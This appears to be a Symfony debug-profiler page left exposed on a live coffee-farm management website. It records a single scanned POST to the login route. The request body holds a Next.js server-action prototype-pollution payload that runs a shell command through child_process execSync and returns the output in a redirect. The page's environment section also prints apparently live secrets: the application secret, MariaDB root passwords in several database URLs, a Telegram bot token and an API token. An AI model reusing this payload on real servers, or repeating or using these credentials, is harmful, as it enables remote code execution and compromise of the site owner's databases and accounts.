Redirect 302 redirect from POST @security_login (247f9a)

POST https://finca-demo.sisprocoffee.com/es/login

Request / Response

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 2>&1 | head -c 500 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"Sispro\Apps\FincaChurupampa\Demo\Controller\SecurityController::login"
_firewall_context
"security.firewall.map.context.main"
_locale
"es"
_redirected
true
_route
"security_login"
_route_params
[
  "_locale" => "es"
]
_security.last_username
""
_security_firewall_run
"_security_main"
_security_remember_me_cookie
Symfony\Component\HttpFoundation\Cookie {#390
  #expire: 1
  #path: "/"
  -sameSite: "lax"
  -secureDefault: false
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #secure: true
  #httpOnly: true
  -raw: false
  -partitioned: false
}

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
connection
"keep-alive"
content-length
"772"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie
"fincachurupampa_demo=8c31412fd7da796e3dffe1b50bdee355; sf_redirect=%7B%22token%22%3A%22247f9a%22%2C%22route%22%3A%22security_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Sispro%5C%5CApps%5C%5CFincaChurupampa%5C%5CDemo%5C%5CController%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fwww%5C%2Fsisprocoffee%5C%2Fmain%5C%2Fapps%5C%2Ffincachurupampa%5C%2Fdemo%5C%2Fsrc%5C%2FController%5C%2FSecurityController.php%22%2C%22line%22%3A24%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"finca-demo.sisprocoffee.com"
next-action
"x"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-nextjs-html-request-id
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id
"b5dce965"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=utf-8"
date
"Thu, 11 Dec 2025 13:55:40 GMT"
location
"/es/login"
set-cookie
"REMEMBERME=deleted; expires=Wed, 11 Dec 2024 13:55:39 GMT; Max-Age=0; path=/; secure; httponly; samesite=lax"
x-debug-token
"e7cb4d"

Cookies

Request Cookies

Key Value
fincachurupampa_demo
"8c31412fd7da796e3dffe1b50bdee355"
sf_redirect
"{"token":"247f9a","route":"security_login","method":"POST","controller":{"class":"Sispro\\Apps\\FincaChurupampa\\Demo\\Controller\\SecurityController","method":"login","file":"\/www\/sisprocoffee\/main\/apps\/fincachurupampa\/demo\/src\/Controller\/SecurityController.php","line":24},"status_code":302,"status_text":"Found"}"

Response Cookies

Key Value
REMEMBERME
Symfony\Component\HttpFoundation\Cookie {#390
  #expire: 1
  #path: "/"
  -sameSite: "lax"
  -secureDefault: false
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #secure: true
  #httpOnly: true
  -raw: false
  -partitioned: false
}

Session

Session Metadata

Key Value
Created
"Thu, 11 Dec 25 08:55:40 -0500"
Last used
"Thu, 11 Dec 25 08:55:40 -0500"
Lifetime
0

Session Attributes

Attribute Value
_security.last_error
Symfony\Component\Security\Core\Exception\InvalidCsrfTokenException {#362
  #message: "Invalid CSRF token."
  #code: 0
  #file: "/www/sisprocoffee/main/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
  #line: 49
  -token: null
  trace: {
    /www/sisprocoffee/main/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php:49 {
      Symfony\Component\Security\Http\EventListener\CsrfProtectionListener->checkPassport(CheckPassportEvent $event): void …
      › if (false === $this->csrfTokenManager->isTokenValid($csrfToken)) {    throw new InvalidCsrfTokenException('Invalid CSRF token.');}
    }
    /www/sisprocoffee/main/vendor/symfony/event-dispatcher/EventDispatcher.php:246 {
      Symfony\Component\EventDispatcher\EventDispatcher::{closure:Symfony\Component\EventDispatcher\EventDispatcher::optimizeListeners():241} …
      ›     }    ($closure = $listener(...))(...$args);};
    }
    /www/sisprocoffee/main/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
      ›     }    $listener($event, $eventName, $this);}
    }
    /www/sisprocoffee/main/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /www/sisprocoffee/main/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:189 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › $event = new CheckPassportEvent($authenticator, $passport);$this->eventDispatcher->dispatch($event);}
    /www/sisprocoffee/main/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:167 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
    }
    /www/sisprocoffee/main/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:149 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
    }
    /www/sisprocoffee/main/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:38 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
    }
    /www/sisprocoffee/main/vendor/symfony/security-http/Firewall/AbstractListener.php:26 {
      Symfony\Component\Security\Http\Firewall\AbstractListener->__invoke(RequestEvent $event): void …
      › if (false !== $this->supports($event->getRequest())) {    $this->authenticate($event);}
    }
    /www/sisprocoffee/main/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:61 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->__invoke(RequestEvent $event): void …
      › foreach ($listeners as $listener) {    $listener($event);}
    /www/sisprocoffee/main/vendor/symfony/security-http/Firewall.php:126 {
      Symfony\Component\Security\Http\Firewall->callListeners(RequestEvent $event, iterable $listeners) …
      › if (!$listener instanceof FirewallListenerInterface) {    $listener($event);} elseif (false !== $listener->supports($event->getRequest())) {
    }
    /www/sisprocoffee/main/vendor/symfony/security-http/Firewall.php:92 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
    }
    /www/sisprocoffee/main/vendor/symfony/event-dispatcher/EventDispatcher.php:246 {
      Symfony\Component\EventDispatcher\EventDispatcher::{closure:Symfony\Component\EventDispatcher\EventDispatcher::optimizeListeners():241} …
      ›     }    ($closure = $listener(...))(...$args);};
    }
    /www/sisprocoffee/main/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
      ›     }    $listener($event, $eventName, $this);}
    }
    /www/sisprocoffee/main/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /www/sisprocoffee/main/vendor/symfony/http-kernel/HttpKernel.php:159 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /www/sisprocoffee/main/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /www/sisprocoffee/main/vendor/symfony/http-kernel/Kernel.php:182 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /www/sisprocoffee/main/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);}
    /www/sisprocoffee/main/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /www/sisprocoffee/main/apps/fincachurupampa/demo/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/../../../vendor/autoload_runtime.php';arguments: {
        "/www/sisprocoffee/main/vendor/autoload_runtime.php"
      }
    }
  }
}
_security.last_username
""
_security.main.target_path
"https://finca-demo.sisprocoffee.com/"

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"prod"
APP_SECRET
"fXQeMySjmjmT8U28FTQfHPMThZn5asTZa6ZswRkpWB8EBNsn"
CORS_ALLOW_ORIGIN
"*"
FINCACHURUPAMPA_APP_ENV
"prod"
FINCACHURUPAMPA_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/sispro_finca?serverVersion=11.8.1-MariaDB&charset=utf8mb4"
FINCACHURUPAMPA_TELEGRAM_DSN
"telegram://5254940230:AAGxC1WNA4w5RmS9H8kCsCuohrZ9dIyjT9I@default?channel=-1001565453323"
FINCA_DEMO_APP_ENV
"dev"
FINCA_DEMO_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/sispro_demo?serverVersion=11.8.1-MariaDB&charset=utf8mb4"
FORMULARIO_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/solcafe_forms?serverVersion=11.8.1-MariaDB&charset=utf8mb4"
INCAHUASI_APP_ENV
"prod"
INCAHUASI_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/sispro_incahuasi?serverVersion=11.8.1-MariaDB&charset=utf8mb4"
LOCK_DSN
"flock"
MAILER_URL
"null://localhost"
MESSENGER_TRANSPORT_DSN
"doctrine://default"
PERU_CONSULTA_API
"https://peruconsulta.pidia.pe/api/v1"
PERU_CONSULTA_TOKEN
"EJWZJUyOrFqMjaohx4IBySaoF0xS2hx2DPxKbSXeBJvLXZ1RCDVKHx4Cm95KTutn"
SANFERNANDO_APP_ENV
"prod"
SANFERNANDO_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/sispro_sanfernando?serverVersion=11.8.1-MariaDB&charset=utf8mb4"
SELVAANDINA_APP_ENV
"prod"
SELVAANDINA_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/sispro_selvaandina?serverVersion=11.8.1-MariaDB&charset=utf8mb4"
SOLCAFE_APP_ENV
"prod"
SOLCAFE_DATABASE_URL
"mysql://root:dvQcn2X8M4FUGqNTsj7h6KxPtw@localhost/sispro_solcafe?serverVersion=11.8.1-MariaDB&charset=utf8mb4"

Defined as regular env variables

Key Value
APP_DEBUG
"0"
CONTENT_LENGTH
"772"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
DOCUMENT_ROOT
"/www/sisprocoffee/main/apps/fincachurupampa/demo/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_CONNECTION
"keep-alive"
HTTP_CONTENT_LENGTH
"772"
HTTP_CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
HTTP_COOKIE
"fincachurupampa_demo=8c31412fd7da796e3dffe1b50bdee355; sf_redirect=%7B%22token%22%3A%22247f9a%22%2C%22route%22%3A%22security_login%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Sispro%5C%5CApps%5C%5CFincaChurupampa%5C%5CDemo%5C%5CController%5C%5CSecurityController%22%2C%22method%22%3A%22login%22%2C%22file%22%3A%22%5C%2Fwww%5C%2Fsisprocoffee%5C%2Fmain%5C%2Fapps%5C%2Ffincachurupampa%5C%2Fdemo%5C%2Fsrc%5C%2FController%5C%2FSecurityController.php%22%2C%22line%22%3A24%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"finca-demo.sisprocoffee.com"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_NEXTJS_HTML_REQUEST_ID
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID
"b5dce965"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_STATUS
"200"
REMOTE_ADDR
"18.201.64.215"
REMOTE_PORT
"39274"
REMOTE_USER
""
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1765461340
REQUEST_TIME_FLOAT
1765461340.7201
REQUEST_URI
"/es/login"
SCRIPT_FILENAME
"/www/sisprocoffee/main/apps/fincachurupampa/demo/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"66.179.82.227"
SERVER_NAME
"finca-demo.sisprocoffee.com"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.28.0"
SYMFONY_DOTENV_PATH
"/www/sisprocoffee/main/.env"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,CORS_ALLOW_ORIGIN,MAILER_URL,LOCK_DSN,INCAHUASI_APP_ENV,INCAHUASI_DATABASE_URL,SANFERNANDO_APP_ENV,SANFERNANDO_DATABASE_URL,SOLCAFE_APP_ENV,SOLCAFE_DATABASE_URL,FORMULARIO_DATABASE_URL,SELVAANDINA_APP_ENV,SELVAANDINA_DATABASE_URL,FINCACHURUPAMPA_APP_ENV,FINCACHURUPAMPA_DATABASE_URL,FINCACHURUPAMPA_TELEGRAM_DSN,FINCA_DEMO_APP_ENV,FINCA_DEMO_DATABASE_URL,PERU_CONSULTA_API,PERU_CONSULTA_TOKEN"
USER
"www-data"